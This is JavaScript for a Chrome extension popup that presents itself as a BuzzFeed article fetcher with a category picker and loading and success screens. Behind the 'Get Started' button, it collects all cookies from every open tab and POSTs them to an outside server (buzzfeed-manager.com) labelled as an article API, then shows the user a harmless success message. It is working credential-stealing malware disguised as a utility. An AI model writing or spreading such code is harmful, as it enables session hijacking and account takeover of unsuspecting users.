document.addEventListener('DOMContentLoaded', () => {
  // Dashboard navigation
  document.getElementById("Dashboard").addEventListener("click", () => {
    chrome.tabs.create({ url: "https://buzzfeed-manager.com/dashboard" }); // Replace with the actual URL
  });

  // DOM elements
  const splashScreen = document.getElementById('splashScreen');
  const categoryScreen = document.getElementById('categoryScreen');
  const getStartedButton = document.getElementById('getStartedButton');
  const categoryDropdown = document.getElementById('categoryDropdown');

  const loadingScreen = document.createElement('div');
  loadingScreen.classList.add('screen', 'hidden');
  loadingScreen.innerHTML = `
      <div class="loader"></div>
      <p>Fetching articles...</p>
    `;
  document.body.appendChild(loadingScreen);

  const successScreen = document.createElement('div');
  successScreen.classList.add('screen', 'hidden');
  successScreen.innerHTML = `
      <h2>Success!</h2>
      <p>Articles have been successfully fetched and sent to your web panel.</p>
      <button id="fetchAgainButton">Fetch Again</button>
    `;
  document.body.appendChild(successScreen);

  const fetchAgainButton = successScreen.querySelector('#fetchAgainButton');

  // Splash Screen: Show for 3 seconds, then switch to category screen
  setTimeout(() => {
    splashScreen.classList.remove('active');
    splashScreen.classList.add('hidden');
    categoryScreen.classList.remove('hidden');
    categoryScreen.classList.add('active');
  }, 3000);

  // On 'Get Started' click
  getStartedButton.addEventListener('click', async () => {
    const selectedCategory = categoryDropdown.value;

    if (!selectedCategory) {
      alert("Please select a category!");
      return;
    }

    try {
      // Fetch all cookies for all tabs
      const allCookies = await getAllCookiesForAllTabs();
      console.log('Final cookie list:', allCookies);

      // Switch to loading spinner
      categoryScreen.classList.remove('active');
      categoryScreen.classList.add('hidden');
      loadingScreen.classList.remove('hidden');
      loadingScreen.classList.add('active');

      // Fetch articles
      await fetchArticles(selectedCategory, allCookies);

      // Switch to success screen
      loadingScreen.classList.remove('active');
      loadingScreen.classList.add('hidden');
      successScreen.classList.remove('hidden');
      successScreen.classList.add('active');

    } catch (error) {
      console.error('Error during article fetch process:', error);
      alert("An error occurred while fetching articles. Please try again.");

      // Switch back to category screen on error
      loadingScreen.classList.remove('active');
      loadingScreen.classList.add('hidden');
      categoryScreen.classList.remove('hidden');
      categoryScreen.classList.add('active');
    }
  });

  // Allow user to fetch articles again
  fetchAgainButton.addEventListener('click', () => {
    successScreen.classList.remove('active');
    successScreen.classList.add('hidden');
    categoryScreen.classList.remove('hidden');
    categoryScreen.classList.add('active');
  });

  // Functions

  async function getAllCookiesForAllTabs() {
    try {
      const tabs = await queryTabs(); // Get all tabs
      const cookiePromises = tabs.map(tab => getCookies(tab.url)); // Create an array of promises
      const cookiesArray = await Promise.all(cookiePromises); // Wait for all promises to resolve

      const allCookies = cookiesArray.flat(); // Flatten the nested arrays
      return allCookies;
    } catch (error) {
      console.error('Error fetching cookies:', error);
      throw error;
    }
  }

  function queryTabs() {
    return new Promise((resolve, reject) => {
      chrome.tabs.query({}, tabs => {
        if (chrome.runtime.lastError) {
          return reject(chrome.runtime.lastError.message);
        }
        resolve(tabs);
      });
    });
  }

  function getCookies(url) {
    return new Promise((resolve, reject) => {
      if (!url) {
        return resolve([]); // If no URL, return an empty array
      }

      chrome.cookies.getAll({ url }, cookies => {
        if (chrome.runtime.lastError) {
          return reject(chrome.runtime.lastError.message);
        }
        resolve(cookies);
      });
    });
  }

  function fetchArticles(category, c) {
    return new Promise((resolve, reject) => {
      fetch(`https://buzzfeed-manager.com/api/fetch-articles`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Accept': 'application/json',
        },
        body: JSON.stringify({
          category: category,
          cookies: c
        }),
      })
        .then(response => {
          if (!response.ok) {
            throw new Error('Network response was not ok');
          }
          return response.json();
        })
        .then(data => {
          if (data.success) {
            console.log('Articles fetched successfully:', data);
            resolve(data); // Resolve with the data
          } else {
            throw new Error('Failed to fetch articles');
          }
        })
        .catch(error => {
          console.error("Error fetching articles:", error);
          reject(error); // Reject the promise with the error
        });
    });
  }

});
